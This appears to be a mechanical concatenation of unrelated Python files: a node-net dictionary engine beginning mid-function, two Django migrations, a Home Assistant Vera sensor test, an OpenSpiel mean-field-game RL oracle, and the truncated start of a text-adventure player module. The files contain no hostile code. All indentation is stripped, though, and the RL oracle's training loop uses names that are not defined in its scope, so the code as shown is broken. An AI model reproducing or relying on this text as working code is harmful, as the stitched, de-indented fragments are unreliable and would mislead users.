if l.source_node.parent_nodespace != node.parent_nodespace:
nodes[l.source_node.uid] = l.source_node.get_data(include_links=False)
if l.target_node.parent_nodespace != node.parent_nodespace:
nodes[l.target_node.uid] = l.target_node.get_data(include_links=False)
return list(links.values()), nodes
def get_nodes(self, nodespace_uids=[], include_links=True, links_to_nodespaces=[]):
"""
Returns a dict with contents for the given nodespaces
"""
data = {}
data['nodes'] = {}
data['nodespaces'] = {}
followupnodes = []
fetch_all = False
if nodespace_uids == []:
nodespace_uids = self.get_nodespace_uids()
root = self.get_nodespace(None)
data['nodespaces'][root.uid] = root.get_data()
fetch_all = True
else:
nodespace_uids = [self.get_nodespace(uid).uid for uid in nodespace_uids]
for nodespace_uid in nodespace_uids:
data['nodespaces'].update(self.construct_nodespaces_dict(nodespace_uid))
nodespace = self.get_nodespace(nodespace_uid)
for uid in nodespace.get_known_ids(entitytype="nodes"):
node = self.get_node(uid)
data['nodes'][uid] = node.get_data(include_links=include_links)
if include_links and not fetch_all:
followupnodes.extend(node.get_associated_node_uids())
if include_links:
for uid in set(followupnodes):
if uid not in data['nodes']:
node = self.get_node(uid).get_data(include_links=True)
for gate in list(node['links'].keys()):
links = node['links'][gate]
for idx, l in enumerate(links):
if self._nodes[l['target_node_uid']].parent_nodespace not in nodespace_uids:
del links[idx]
if len(node['links'][gate]) == 0:
del node['links'][gate]
data['nodes'][uid] = node
return data
def save(self, base_path=None, zipfile=None):
if base_path is None:
base_path = self.persistency_path
data = json.dumps(self.export_json(), indent=4)
if self.numpy_available:
import io
import numpy as np
# write numpy states of native modules
numpy_states = self.construct_native_modules_numpy_state_dict()
for node_uid, states in numpy_states.items():
if len(states) > 0:
filename = "%s_numpystate.npz" % node_uid
if zipfile:
stream = io.BytesIO()
np.savez(stream, **states)
stream.seek(0)
zipfile.writestr(filename, stream.getvalue())
else:
np.savez(os.path.join(base_path, filename), **states)
if zipfile:
zipfile.writestr('nodenet.json', data)
else:
filename = os.path.join(base_path, 'nodenet.json')
# dict_engine saves everything to json, just dump the json export
with open(filename, 'w+', encoding="utf-8") as fp:
fp.write(data)
if os.path.getsize(filename) < 100:
# kind of hacky, but we don't really know what was going on
raise RuntimeError("Error writing nodenet file")
def load(self):
"""Load the node net from a file"""
# try to access file
if self._version != NODENET_VERSION:
self.logger.error("Wrong version of nodenet data in nodenet %s, cannot load." % self.uid)
return False
filename = os.path.join(self.persistency_path, 'nodenet.json')
with self.netlock:
initfrom = {}
if os.path.isfile(filename):
try:
self.logger.info("Loading nodenet %s from file %s", self.name, filename)
with open(filename, encoding="utf-8") as file:
initfrom.update(json.load(file))
except ValueError:
self.logger.warning("Could not read nodenet data")
return False
except IOError:
self.logger.warning("Could not open nodenet file")
return False
self.initialize_nodenet(initfrom)
if self.numpy_available:
import numpy as np
# recover numpy states for native modules
for uid in self._nodes:
if self._nodes[uid].type in self.native_modules:
file = os.path.join(self.persistency_path, '%s_numpystate.npz' % uid)
if os.path.isfile(file):
node = self.get_node(uid)
numpy_states = np.load(file)
node.set_persistable_state(node._state, numpy_states)
numpy_states.close()
return True
def _load_nodetypes(self, nodetype_data):
newnative_modules = {}
for key, data in nodetype_data.items():
if data.get('engine', self.engine) == self.engine:
try:
if data.get('dimensionality'):
raise NotImplementedError("dict nodenet does not support highdimensional native modules")
else:
newnative_modules[key] = Nodetype(nodenet=self, **data)
except Exception as err:
self.logger.error("Can not instantiate node type %s: %s: %s" % (key, err.__class__.__name__, str(err)))
post_mortem()
return newnative_modules
def reload_native_modules(self, native_modules):
""" reloads the native-module definition, and their nodefunctions
and afterwards reinstantiates the nodenet."""
self.native_modules = self._load_nodetypes(native_modules)
self.native_module_definitions = dict((uid, native_modules[uid]) for uid in self.native_modules)
saved = self.export_json()
self.clear()
self.merge_data(saved, keep_uids=True)
def initialize_nodespace(self, id, data):
if id not in self._nodespaces:
# move up the nodespace tree until we find an existing parent or hit root
while id != 'Root' and data[id].get('parent_nodespace') not in self._nodespaces:
self.initialize_nodespace(data[id]['parent_nodespace'], data)
self._nodespaces[id] = DictNodespace(self,
data[id].get('parent_nodespace'),
name=data[id].get('name', 'Root'),
uid=id,
index=data[id].get('index'))
def initialize_nodenet(self, initfrom):
"""Called after reading new nodenet state.
Parses the nodenet state and set up the non-persistent data structures necessary for efficient
computation of the node net
"""
self._modulators.update(initfrom.get("modulators", {}))
if initfrom.get('runner_condition'):
self.set_runner_condition(initfrom['runner_condition'])
self._nodespace_ui_properties = initfrom.get('nodespace_ui_properties', {})
# set up nodespaces; make sure that parent nodespaces exist before children are initialized
self._nodespaces = {}
self._nodespaces["Root"] = DictNodespace(self, None, name="Root", uid="Root")
if 'current_step' in initfrom:
self._step = initfrom['current_step']
if 'last_assigned_node_id' in initfrom:
self._last_assigned_node_id = initfrom['last_assigned_node_id']
if len(initfrom) != 0:
# now merge in all init data (from the persisted file typically)
self.merge_data(initfrom, keep_uids=True)
def generate_uid(self, entitytype=None):
self._last_assigned_node_id += 1
return "n%d" % self._last_assigned_node_id
def construct_links_list(self):
data = []
for node_uid in self.get_node_uids():
node = self.get_node(node_uid)
for g in node.get_gate_types():
data.extend([l.get_data(complete=True) for l in node.get_gate(g).get_links()])
return data
def construct_nodes_dict(self, **params):
data = {}
for node_uid in self.get_node_uids():
data[node_uid] = self.get_node(node_uid).get_data(**params)
return data
def construct_native_modules_numpy_state_dict(self):
numpy_states = {}
if self.numpy_available:
for uid in self._nodes:
numpy_state = self._nodes[uid].get_persistable_state()[1]
if numpy_state:
numpy_states[uid] = numpy_state
return numpy_states
def construct_nodespaces_dict(self, nodespace_uid, transitive=False):
data = {}
if nodespace_uid is None:
nodespace_uid = "Root"
if transitive:
for nodespace_candidate_uid in self.get_nodespace_uids():
is_in_hierarchy = False
if nodespace_candidate_uid == nodespace_uid:
is_in_hierarchy = True
else:
parent_uid = self.get_nodespace(nodespace_candidate_uid).parent_nodespace
while parent_uid is not None and parent_uid != nodespace_uid:
parent_uid = self.get_nodespace(parent_uid).parent_nodespace
if parent_uid == nodespace_uid:
is_in_hierarchy = True
if is_in_hierarchy:
data[nodespace_candidate_uid] = self.get_nodespace(nodespace_candidate_uid).get_data()
else:
for uid in self.get_nodespace(nodespace_uid).get_known_ids('nodespaces'):
data[uid] = self.get_nodespace(uid).get_data()
return data
def get_nodetype(self, type):
""" Returns the nodetpype instance for the given nodetype or native_module or None if not found"""
if type in self.nodetypes:
return self.nodetypes[type]
else:
return self.native_modules[type]
def get_activation_data(self, nodespace_uids=None, rounded=1):
activations = {}
node_ids = []
if nodespace_uids == []:
node_ids = self._nodes.keys()
else:
for nsuid in nodespace_uids:
node_ids.extend(self.get_nodespace(nsuid).get_known_ids("nodes"))
for uid in node_ids:
node = self.get_node(uid)
if rounded is None:
act = [node.get_gate(gate_name).activation for gate_name in node.get_gate_types()]
if set(act) != {0}:
activations[uid] = act
else:
act = [round(node.get_gate(gate_name).activation, rounded) for gate_name in node.get_gate_types()]
if set(act) != {0}:
activations[uid] = act
return activations
def delete_node(self, node_uid):
if node_uid in self._nodespaces:
affected_entity_ids = self._nodespaces[node_uid].get_known_ids()
for uid in affected_entity_ids:
self.delete_node(uid)
parent_nodespace = self._nodespaces.get(self._nodespaces[node_uid].parent_nodespace)
if parent_nodespace and parent_nodespace.is_entity_known_as('nodespaces', node_uid):
parent_nodespace._unregister_entity('nodespaces', node_uid)
parent_nodespace.contents_last_changed = self.current_step
del self._nodespaces[node_uid]
self._track_deletion('nodespaces', node_uid)
else:
node = self._nodes[node_uid]
node.unlink_completely()
parent_nodespace = self._nodespaces.get(self._nodes[node_uid].parent_nodespace)
parent_nodespace._unregister_entity('nodes', node_uid)
parent_nodespace.contents_last_changed = self.current_step
if self._nodes[node_uid].type == "Activator":
parent_nodespace.unset_activator_value(self._nodes[node_uid].get_parameter('type'))
del self._nodes[node_uid]
self._track_deletion('nodes', node_uid)
def delete_nodespace(self, nodespace_uid):
self._nodespace_ui_properties.pop(nodespace_uid, None)
self.delete_node(nodespace_uid)
def clear(self):
super().clear()
self._nodes = {}
self.initialize_nodenet({})
def _register_node(self, node):
self._nodes[node.uid] = node
node.last_changed = self.current_step
self.get_nodespace(node.parent_nodespace).contents_last_changed = self.current_step
if node.type not in STANDARD_NODETYPES:
self.native_module_instances[node.uid] = node
def _register_nodespace(self, nodespace):
self._nodespaces[nodespace.uid] = nodespace
nodespace.last_changed = self.current_step
self.get_nodespace(nodespace.parent_nodespace).contents_last_changed = self.current_step
def merge_data(self, nodenet_data, keep_uids=False, uidmap={}, **_):
"""merges the nodenet state with the current node net, might have to give new UIDs to some entities"""
# merge in spaces, make sure that parent nodespaces exist before children are initialized
nodespaces_to_merge = set(nodenet_data.get('nodespaces', {}).keys())
for nodespace in nodespaces_to_merge:
self.initialize_nodespace(nodespace, nodenet_data['nodespaces'])
invalid_nodes = []
# merge in nodes
for uid in nodenet_data.get('nodes', {}):
data = nodenet_data['nodes'][uid]
if not keep_uids:
newuid = self.generate_uid("nodes")
else:
newuid = uid
data['uid'] = newuid
uidmap[uid] = newuid
if data['type'] not in self.nodetypes and data['type'] not in self.native_modules:
self.logger.error("Invalid nodetype %s for node %s" % (data['type'], uid))
invalid_nodes.append(uid)
continue
self._nodes[newuid] = DictNode(self, **data)
# merge in links
links = nodenet_data.get('links', [])
if isinstance(links, dict):
# compatibility
links = links.values()
for link in links:
if link['source_node_uid'] in invalid_nodes or link['target_node_uid'] in invalid_nodes:
continue
try:
self.create_link(
uidmap[link['source_node_uid']],
link['source_gate_name'],
uidmap[link['target_node_uid']],
link['target_slot_name'],
link['weight']
)
except ValueError:
self.logger.warning("Invalid link data")
for monitorid in nodenet_data.get('monitors', {}):
data = nodenet_data['monitors'][monitorid]
if 'node_uid' in data:
old_node_uid = data['node_uid']
if old_node_uid in uidmap:
data['node_uid'] = uidmap[old_node_uid]
if 'classname' in data:
if hasattr(monitor, data['classname']):
mon = getattr(monitor, data['classname'])(self, **data)
self._monitors[mon.uid] = mon
else:
self.logger.warning('unknown classname for monitor: %s (uid:%s) ' % (data['classname'], monitorid))
def step(self):
"""perform a calculation step"""
with self.netlock:
self._step += 1
for operator in self.stepoperators:
operator.execute(self, self._nodes.copy(), self.netapi)
steps = sorted(list(self.deleted_items.keys()))
if steps:
for i in steps:
if i >= self.current_step - 100:
break
else:
del self.deleted_items[i]
self.user_prompt_response = {}
def create_node(self, nodetype, nodespace_uid, position, name="", uid=None, parameters=None, gate_configuration=None):
nodespace_uid = self.get_nodespace(nodespace_uid).uid
if nodetype in self.native_modules:
if name is None or name == "" or name == uid:
name = nodetype
node = DictNode(
self,
nodespace_uid,
position, name=name,
type=nodetype,
uid=uid,
parameters=parameters,
gate_configuration=gate_configuration)
return node.uid
def create_nodespace(self, parent_uid, name="", uid=None, options=None):
parent_uid = self.get_nodespace(parent_uid).uid
nodespace = DictNodespace(self, parent_uid, name=name, uid=uid)
return nodespace.uid
def get_node(self, uid):
return self._nodes[uid]
def get_nodespace(self, uid):
if uid is None:
uid = "Root"
return self._nodespaces[uid]
def get_node_uids(self, group_nodespace_uid=None, group=None):
if group is not None:
if group_nodespace_uid is None:
group_nodespace_uid = self.get_nodespace(None).uid
return [n.uid for n in self.nodegroups[group_nodespace_uid][group][0]]
else:
return list(self._nodes.keys())
def get_nodespace_uids(self):
return list(self._nodespaces.keys())
def is_node(self, uid):
return uid in self._nodes
def is_nodespace(self, uid):
return uid in self._nodespaces
def set_node_positions(self, positions):
""" Sets the position of nodes or nodespaces """
for uid in positions:
if uid in self._nodes:
self._nodes[uid].position = positions[uid]
def get_nativemodules(self, nodespace=None):
"""Returns a dict of native modules. Optionally filtered by the given nodespace"""
nodes = self._nodes if nodespace is None else self._nodespaces[nodespace].get_known_ids('nodes')
nativemodules = {}
for uid in nodes:
if self._nodes[uid].type not in STANDARD_NODETYPES:
nativemodules.update({uid: self._nodes[uid]})
return nativemodules
def get_activators(self, nodespace=None, type=None):
"""Returns a dict of activator nodes. OPtionally filtered by the given nodespace and the given type"""
nodes = self._nodes if nodespace is None else self._nodespaces[nodespace].get_known_ids('nodes')
activators = {}
for uid in nodes:
if self._nodes[uid].type == 'Activator':
if type is None or type == self._nodes[uid].get_parameter('type'):
activators.update({uid: self._nodes[uid]})
return activators
def get_sensors(self, nodespace=None, datasource=None):
"""Returns a dict of all sensor nodes. Optionally filtered by the given nodespace"""
nodes = self._nodes if nodespace is None else self._nodespaces[nodespace].get_known_ids('nodes')
sensors = {}
for uid in nodes:
if self._nodes[uid].type == 'Sensor':
if datasource is None or self._nodes[uid].get_parameter('datasource') == datasource:
sensors[uid] = self._nodes[uid]
return sensors
def get_actuators(self, nodespace=None, datatarget=None):
"""Returns a dict of all actuator nodes. Optionally filtered by the given nodespace"""
nodes = self._nodes if nodespace is None else self._nodespaces[nodespace].get_known_ids('nodes')
actuators = {}
for uid in nodes:
if self._nodes[uid].type == 'Actuator':
if datatarget is None or self._nodes[uid].get_parameter('datatarget') == datatarget:
actuators[uid] = self._nodes[uid]
return actuators
def set_link_weight(self, source_node_uid, gate_type, target_node_uid, slot_type, weight=1):
"""Set weight of the given link."""
source_node = self.get_node(source_node_uid)
if source_node is None:
return False
link = source_node.link(gate_type, target_node_uid, slot_type, weight)
if link is None:
return False
else:
return True
def create_link(self, source_node_uid, gate_type, target_node_uid, slot_type, weight=1):
"""Creates a new link.
Arguments.
source_node_uid: uid of the origin node
gate_type: type of the origin gate (usually defines the link type)
target_node_uid: uid of the target node
slot_type: type of the target slot
weight: the weight of the link (a float)
Returns:
the link if successful,
None if failure
"""
source_node = self.get_node(source_node_uid)
if source_node is None:
return False, None
source_node.link(gate_type, target_node_uid, slot_type, weight)
return True
def delete_link(self, source_node_uid, gate_type, target_node_uid, slot_type):
"""Delete the given link."""
source_node = self.get_node(source_node_uid)
if source_node is None:
return False, None
source_node.unlink(gate_type, target_node_uid, slot_type)
return True
def construct_modulators_dict(self):
"""
Returns a new dict containing all modulators
"""
return self._modulators.copy()
def get_standard_nodetype_definitions(self):
"""
Returns the standard node types supported by this nodenet
"""
return copy.deepcopy(STANDARD_NODETYPES)
def group_nodes_by_names(self, nodespace_uid, node_name_prefix=None, gatetype="gen", sortby='id', group_name=None):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if nodespace_uid not in self.nodegroups:
self.nodegroups[nodespace_uid] = {}
if group_name is None:
group_name = node_name_prefix
nodes = self.netapi.get_nodes(nodespace_uid, node_name_prefix)
if sortby == 'id':
nodes = sorted(nodes, key=lambda node: node.uid)
elif sortby == 'name':
nodes = sorted(nodes, key=lambda node: node.name)
self.nodegroups[nodespace_uid][group_name] = (nodes, gatetype)
def group_nodes_by_ids(self, nodespace_uid, node_uids, group_name, gatetype="gen", sortby=None):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if nodespace_uid not in self.nodegroups:
self.nodegroups[nodespace_uid] = {}
nodes = []
for node_uid in node_uids:
node = self.get_node(node_uid)
if node.parent_nodespace != nodespace_uid:
raise ValueError("Node %s is not in nodespace %s" % (node_uid, nodespace_uid))
nodes.append(node)
if sortby == 'id':
nodes = sorted(nodes, key=lambda node: node.uid)
elif sortby == 'name':
nodes = sorted(nodes, key=lambda node: node.name)
self.nodegroups[nodespace_uid][group_name] = (nodes, gatetype)
def ungroup_nodes(self, nodespace_uid, group):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group in self.nodegroups[nodespace_uid]:
del self.nodegroups[nodespace_uid][group]
def get_activations(self, nodespace_uid, group):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group not in self.nodegroups[nodespace_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group, nodespace_uid))
activations = []
nodes = self.nodegroups[nodespace_uid][group][0]
gate = self.nodegroups[nodespace_uid][group][1]
for node in nodes:
activations.append(node.get_gate(gate).activation)
return activations
def set_activations(self, nodespace_uid, group, new_activations):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group not in self.nodegroups[nodespace_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group, nodespace_uid))
nodes = self.nodegroups[nodespace_uid][group][0]
gate = self.nodegroups[nodespace_uid][group][1]
for i in range(len(nodes)):
nodes[i].set_gate_activation(gate, new_activations[i])
def get_gate_configurations(self, nodespace_uid, group, gatefunction_parameter=None):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group not in self.nodegroups[nodespace_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group, nodespace_uid))
nodes = self.nodegroups[nodespace_uid][group][0]
gate = self.nodegroups[nodespace_uid][group][1]
data = {'gatefunction': set()}
if gatefunction_parameter:
data['parameter_values'] = []
for node in nodes:
config = node.get_gate_configuration(gate)
data['gatefunction'].add(config['gatefunction'])
if gatefunction_parameter is not None:
data['parameter_values'].append(config['gatefunction_parameters'].get(gatefunction_parameter, 0))
if len(data['gatefunction']) > 1:
raise RuntimeError("Heterogenous gatefunction configuration")
data['gatefunction'] = data['gatefunction'].pop()
return data
def set_gate_configurations(self, nodespace_uid, group, gatefunction, gatefunction_parameter=None, parameter_values=None):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group not in self.nodegroups[nodespace_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group, nodespace_uid))
nodes = self.nodegroups[nodespace_uid][group][0]
gate = self.nodegroups[nodespace_uid][group][1]
for i in range(len(nodes)):
parameter = {}
if gatefunction_parameter:
parameter[gatefunction_parameter] = parameter_values[i]
nodes[i].set_gate_configuration(gate, gatefunction, parameter)
def get_link_weights(self, nodespace_from_uid, group_from, nodespace_to_uid, group_to):
if nodespace_from_uid is None:
nodespace_from_uid = self.get_nodespace(None).uid
if nodespace_to_uid is None:
nodespace_to_uid = self.get_nodespace(None).uid
if group_from not in self.nodegroups[nodespace_from_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group_from, nodespace_from_uid))
if group_to not in self.nodegroups[nodespace_to_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group_to, nodespace_to_uid))
rows = []
to_nodes = self.nodegroups[nodespace_to_uid][group_to][0]
to_slot = self.nodegroups[nodespace_to_uid][group_to][1]
from_nodes = self.nodegroups[nodespace_from_uid][group_from][0]
from_gate = self.nodegroups[nodespace_from_uid][group_from][1]
for to_node in to_nodes:
row = []
for from_node in from_nodes:
links = from_node.get_gate(from_gate).get_links()
hit = None
for link in links:
if link.target_node == to_node and link.target_slot.type == to_slot:
hit = link
break
if hit is not None:
row.append(link.weight)
else:
row.append(0)
rows.append(row)
return rows
def set_link_weights(self, nodespace_from_uid, group_from, nodespace_to_uid, group_to, new_w):
if nodespace_from_uid is None:
nodespace_from_uid = self.get_nodespace(None).uid
if nodespace_to_uid is None:
nodespace_to_uid = self.get_nodespace(None).uid
if group_from not in self.nodegroups[nodespace_from_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group_from, nodespace_from_uid))
if group_to not in self.nodegroups[nodespace_to_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group_to, nodespace_to_uid))
to_nodes = self.nodegroups[nodespace_to_uid][group_to][0]
to_slot = self.nodegroups[nodespace_to_uid][group_to][1]
from_nodes = self.nodegroups[nodespace_from_uid][group_from][0]
from_gate = self.nodegroups[nodespace_from_uid][group_from][1]
if type(new_w) == int and new_w == 1:
if len(from_nodes) != len(to_nodes):
raise ValueError("from_elements and to_elements need to have equal lengths for identity links")
for i in range(len(to_nodes)):
self.set_link_weight(
from_nodes[i].uid,
from_gate,
to_nodes[i].uid,
to_slot,
1
)
else:
for row in range(len(to_nodes)):
to_node = to_nodes[row]
for column in range(len(from_nodes)):
from_node = from_nodes[column]
weight = new_w[row][column]
if weight != 0:
self.set_link_weight(from_node.uid, from_gate, to_node.uid, to_slot, weight)
else:
self.delete_link(from_node.uid, from_gate, to_node.uid, to_slot)
def get_available_gatefunctions(self):
"""
Returns a dict of the available gatefunctions and their parameters and parameter-defaults
"""
import inspect
from micropsi_core.nodenet import gatefunctions
data = {}
for name, func in inspect.getmembers(gatefunctions, inspect.isfunction):
sig = inspect.signature(func)
data[name] = {}
skip = True
for key in sig.parameters:
if skip:
# first param is input_activation. skip
skip = False
continue
default = sig.parameters[key].default
if default == inspect.Signature.empty:
default = None
data[name][key] = default
return data
def has_nodespace_changes(self, nodespace_uids=[], since_step=0):
if nodespace_uids == []:
nodespace_uids = self.get_nodespace_uids()
for nodespace_uid in nodespace_uids:
if self.get_nodespace(nodespace_uid).contents_last_changed >= since_step:
return True
return False
def get_nodespace_changes(self, nodespace_uids=[], since_step=0, include_links=True):
result = {
'nodes_dirty': {},
'nodespaces_dirty': {},
'nodes_deleted': [],
'nodespaces_deleted': []
}
if nodespace_uids == []:
nodespace_uids = self.get_nodespace_uids()
else:
nodespace_uids = [self.get_nodespace(uid).uid for uid in nodespace_uids]
for i in range(since_step, self.current_step + 1):
if i in self.deleted_items:
result['nodespaces_deleted'].extend(self.deleted_items[i].get('nodespaces_deleted', []))
result['nodes_deleted'].extend(self.deleted_items[i].get('nodes_deleted', []))
for nsuid in nodespace_uids:
for uid in self.get_nodespace(nsuid).get_known_ids():
if uid not in result['nodes_deleted'] and self.is_node(uid):
if self.get_node(uid).last_changed >= since_step:
result['nodes_dirty'][uid] = self.get_node(uid).get_data(include_links=include_links)
if include_links:
for assoc in self.get_node(uid).get_associated_node_uids():
if self.get_node(assoc).parent_nodespace not in nodespace_uids and assoc not in result['nodes_dirty']:
result['nodes_dirty'][assoc] = self.get_node(assoc).get_data(include_links=include_links)
elif uid not in result['nodespaces_deleted'] and self.is_nodespace(uid):
if self.get_nodespace(uid).last_changed >= since_step:
result['nodespaces_dirty'][uid] = self.get_nodespace(uid).get_data()
return result
def get_dashboard(self):
data = super(DictNodenet, self).get_dashboard()
link_uids = []
node_uids = self.get_node_uids()
data['count_nodes'] = len(node_uids)
data['count_positive_nodes'] = 0
data['count_negative_nodes'] = 0
data['nodetypes'] = {"NativeModules": 0}
data['concepts'] = {
'checking': 0,
'verified': 0,
'failed': 0,
'off': 0
}
data['schemas'] = {
'checking': 0,
'verified': 0,
'failed': 0,
'off': 0,
'total': 0
}
for uid in node_uids:
node = self.get_node(uid)
link_uids.extend(node.get_associated_links())
if node.type in STANDARD_NODETYPES:
if node.type not in data['nodetypes']:
data['nodetypes'][node.type] = 1
else:
data['nodetypes'][node.type] += 1
else:
data['nodetypes']['NativeModules'] += 1
if node.activation > 0:
data['count_positive_nodes'] += 1
elif node.activation < 0:
data['count_negative_nodes'] += 1
if node.type == 'Pipe':
if node.get_gate('gen').activation == 0 and node.get_gate('sub').activation > 0 and len(node.get_gate('sub').get_links()):
data['concepts']['checking'] += 1
if node.get_gate('sur').get_links() == []:
data['schemas']['checking'] += 1
elif node.get_gate('sub').activation > 0 and node.activation > 0.5:
data['concepts']['verified'] += 1
if node.get_gate('sur').get_links() == []:
data['schemas']['verified'] += 1
elif node.activation < 0:
data['concepts']['failed'] += 1
if node.get_gate('sur').get_links() == []:
data['schemas']['failed'] += 1
else:
data['concepts']['off'] += 1
if node.get_gate('sur').get_links() == []:
data['schemas']['off'] += 1
data['concepts']['total'] = sum(data['concepts'].values())
data['schemas']['total'] = sum(data['schemas'].values())
data['modulators'] = self.construct_modulators_dict()
data['count_links'] = len(set(link_uids))
return data
|
# Generated by Django 4.0.3 on 2022-03-17 07:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='question',
name='question_desc',
field=models.TextField(default='', null=True),
),
]
|
# Generated by Django 2.0.5 on 2018-06-11 17:17
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import re
class Migration(migrations.Migration):
dependencies = [
('paikkala', '0005_program_automatic_max_tickets'),
]
operations = [
migrations.CreateModel(
name='PerProgramBlock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('excluded_numbers', models.CharField(blank=True, help_text='seat numbers to block from this row in this program', max_length=128, validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')])),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blocks', to='paikkala.Program')),
('row', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='paikkala.Row')),
],
),
]
|
"""Vera tests."""
from unittest.mock import MagicMock
from pyvera import VeraBinarySensor
from homeassistant.core import HomeAssistant
from .common import ComponentFactory
async def test_binary_sensor(
hass: HomeAssistant, vera_component_factory: ComponentFactory
) -> None:
"""Test function."""
vera_device = MagicMock(spec=VeraBinarySensor) # type: VeraBinarySensor
vera_device.device_id = 1
vera_device.name = "dev1"
vera_device.is_tripped = False
entity_id = "binary_sensor.dev1_1"
component_data = await vera_component_factory.configure_component(
hass=hass, devices=(vera_device,)
)
controller = component_data.controller
update_callback = controller.register.call_args_list[0][0][1]
vera_device.is_tripped = False
update_callback(vera_device)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == "off"
controller.register.reset_mock()
vera_device.is_tripped = True
update_callback(vera_device)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == "on"
controller.register.reset_mock()
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from open_spiel.python import policy
from open_spiel.python import rl_environment
from open_spiel.python.jax import dqn
from open_spiel.python.mfg.algorithms import distribution
from open_spiel.python.mfg.algorithms import nash_conv
from open_spiel.python.mfg.algorithms import policy_value
class DQNPolicies(policy.Policy):
"""Joint policy to be evaluated."""
def __init__(self, envs, policies):
game = envs[0].game
player_ids = list(range(game.num_players()))
super(DQNPolicies, self).__init__(game, player_ids)
self._policies = policies
self._obs = {
"info_state": [None] * game.num_players(),
"legal_actions": [None] * game.num_players()
}
def action_probabilities(self, state, player_id=None):
cur_player = state.current_player()
legal_actions = state.legal_actions(cur_player)
self._obs["current_player"] = cur_player
self._obs["info_state"][cur_player] = (state.observation_tensor(cur_player))
self._obs["legal_actions"][cur_player] = legal_actions
info_state = rl_environment.TimeStep(
observations=self._obs, rewards=None, discounts=None, step_type=None)
p = self._policies[cur_player].step(info_state, is_evaluation=True).probs
prob_dict = {action: p[action] for action in legal_actions}
return prob_dict
class MFGRLOracle(object):
def __init__(self,
mfg_game,
best_response_class,
best_response_kwargs,
number_training_episodes,
eval_period,
use_checkpoints=False,
checkpoint_dir=None):
self._mfg_game = mfg_game
self._num_players = mfg_game.num_players
self._use_checkpoints = use_checkpoints
self._eval_period = eval_period
self._checkpoint_dir = checkpoint_dir
self._best_response_class = best_response_class
self._best_response_kwargs = best_response_kwargs
self._num_train_episodes = number_training_episodes
uniform_policy = policy.UniformRandomPolicy(mfg_game)
mfg_dist = distribution.DistributionPolicy(mfg_game, uniform_policy)
self._envs = [
rl_environment.Environment(mfg_game, distribution=mfg_dist, mfg_population=p)
for p in range(self._num_players)
]
self._info_state_size = self._envs[0].observation_spec()["info_state"][0]
self._num_actions = self._envs[0].action_spec()["num_actions"]
self._agents = [
dqn.DQN(idx, self._info_state_size, self._num_actions, **self._best_response_kwargs)
for idx in range(self._num_players)
]
self._joint_avg_policy = DQNPolicies(self._envs, self._agents)
# if use_checkpoints:
# for agent in agents:
# if agent.has_checkpoint(checkpoint_dir):
# agent.restore(checkpoint_dir)
def training(self, distributions):
for ep in range(self._num_train_episodes):
# Training monitoring
if (ep + 1) % self._eval_period == 0:
losses = [agent.loss for agent in self._agents]
logging.info("Losses: %s", losses)
nash_conv_obj = nash_conv.NashConv(self._mfg_game, uniform_policy)
print(
str(ep + 1) + " RL Best Response to Uniform " +
str(nash_conv_obj.br_values()))
pi_value = policy_value.PolicyValue(self._mfg_game, mfg_dist, self._joint_avg_policy)
print(
str(ep + 1) + " DQN Best Response to Uniform " + str([
pi_value.eval_state(state)
for state in self._mfg_game.new_initial_states()
]))
if self._use_checkpoints:
for agent in self._agents:
agent.save(self._checkpoint_dir)
logging.info("_____________________________________________")
# Training for one episode.
for player in range(self._num_players):
time_step = self._envs[player].reset()
while not time_step.last():
agent_output = self._agents[player].step(time_step)
action_list = [agent_output.action]
time_step = self._envs[player].step(action_list)
# Episode is over, step all agents with final info state.
self._agents[player].step(time_step)
def __call__(self, game, distributions):
"""
Call the RL oracle to find the best response strategy for each player.
:param game: A MFG.
:param distributions: the MFG distribution an agent best responds to.
:return:
"""
for player in range(self._num_players):
self._envs[player]._distribution = distributions[player]
|
"""
textgame.player
=====================
This module contains a class :class:`textgame.player.Player` that is used to define
what a player is able to do in the game. Every of its methods that get called by
:class:`textgame.parser.Parser` must take a noun (string) as an argument and return
either a string that describes the action or a :class:`textgame.parser.EnterYesNoLoop`.
For convenience, this module provides wrappers for Player methods:
- :func:`textgame.player.player_method`
- :func:`textgame.player.action_method`
"""
from inspect import signature
from collections import OrderedDict
import random
import logging
logger = logging.getLogger("textgame.player")
logger.addHandler(logging.NullHandler())
from textgame.globals import DIRECTIONS, MOVING, INFO, ACTION, LIGHT, DESCRIPTIONS
from textgame.globals import FIGHTING
from textgame.parser import EnterYesNoLoop
def player_method(f):
"""wrapper for player methods
checks if the method has the right signature, adds a dummy argument if the method doesn't care about nouns. Throws :class:`TypeError` if there are too many arguments.
"""
func = f
# check signature of f
n_args = len(signature(f).parameters)
